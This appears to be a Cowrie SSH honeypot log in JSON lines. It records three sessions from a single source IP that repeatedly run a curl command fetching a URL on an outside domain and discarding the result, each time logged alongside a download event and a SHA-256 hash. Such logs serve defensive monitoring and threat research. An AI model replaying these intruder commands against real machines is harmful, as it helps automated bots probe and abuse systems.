{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.204911Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.206592Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.208034Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.212992Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.215932Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.217309Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.243176Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.245572Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.247725Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.248695Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.254642Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.258288Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.258976Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.278466Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.279248Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.284906Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.287065Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.291175Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.291906Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.308786Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.309786Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.310257Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.313441Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.321478Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.322876Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.323443Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.326848Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.329559Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.360954Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.361772Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.365053Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.367586Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.368576Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.369555Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.373662Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.374483Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.406728Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.407459Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.411959Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.415253Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.415913Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.418575Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.419333Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.447193Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.449405Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.451709Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.452442Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.455712Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.456462Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.458871Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.460091Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.493688Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.494820Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.495228Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.498627Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.501136Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.517823Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.518617Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.520534Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.521359Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.547527Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.548270Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.551681Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.554428Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.557110Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.557623Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.560852Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.580535Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.581315Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.589698Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.590411Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.592676Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.593452Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.599160Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.624908Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.626935Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.628023Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.628820Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:22.631774Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:22.634139Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
